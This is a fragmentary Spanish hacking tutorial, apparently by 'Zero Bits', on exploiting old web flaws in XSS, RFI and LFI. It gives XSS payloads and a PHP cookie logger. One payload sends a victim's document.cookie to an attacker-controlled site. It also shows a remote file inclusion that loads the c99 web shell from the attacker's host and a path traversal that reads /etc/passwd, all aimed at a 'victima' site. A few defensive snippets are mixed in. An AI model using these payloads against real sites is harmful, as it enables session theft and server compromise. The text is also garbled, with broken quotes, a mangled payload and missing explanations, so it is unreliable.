Documente Academic
Documente Profesional
Documente Cultură
Que
Todavía se ven
By Zero Bits [Zero_Bits@GobiernoFederal.com] – [Zero-Bits.BloGspoT.com]
Www.SysTeM-BlaCk.CoM
0. Introduccion
Quienes serán esos viejos?, pues los métodos antiguos como RFI,
LFI y XSS. La gente dice a los novatos que no aprendan estos
métodos ya que no son muy vistos en los Servidores, pero se les a
ocurrido buscar en los directorios o probarlo ahí mismo.
¿Qué es XSS?
Libro de Visitas: Prueba igual que los foros, solo que escribes un
mensaje
www.miweb.com/algo.php?algo=5
Y pones un código HTML o JavaScript, cualquiera sirve:
www.miweb.com/algo.php?algo=<script>alert(“xss”)</script>
<?php
$sinxss = strip_tags($_REQUEST['escritura'];
echo $sinxss;
?>
Aprovechandonos de XSS
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
<script>self.location.href=’e); “target=”
_blank”>http://www.tuweb.com/robacookies.php?c=’+scape(do
cument.cookie);</script>
http://www.victima.com/buscador.php?=
<script>self.location.href=’e); “target=”
_blank”>http://www.tuweb.com/robacookies.php?c=’+scape(do
cument.cookie);</script>
http://www.victima.com/index.php?id=<h1>Hacked</h1>
http://www.victima.com/index.php?id=<h1><marquee>Hacked</mar
quee></h1>
http://www.victima.com/index.php?id=<script>alert(“Hacked”)</script
>
http://www.victima.com/index.php?id=Hacked+by+tu
Despedida
http://www.web.com/algo.php?page=algo
http://www.web.com/algo.php?page=http://www.google.com
Evitando RFI
Empezamos:
Register_globals en OFF
allow_url_fopen en OFF
Aprovechandonos de RFI
c99.txt
¿Qué es c99?
Como ya saben que es una shell, esta es una gran shell y la que
vamos a usar o usan para aprovecharse del bug.
http://www.web.com/algo.php?page=http://www.tuweb.com/c99.gif
Despedida
Evitando LFI
<?php
$_GET['proteccion'] = str_replace(array('.','/','\\'),'',$_GET['protec
cion']);
?>
Ok ahora imaginen que la variable protección quiere mostrar un
contenido ok?
Aprovechándonos
http://www.web.com/index.php?file=algo
Passwd = La contraseña
http://www.web.com/index.php?file=../../../../etc/passwd
4. Bye Bye
Hasta otra…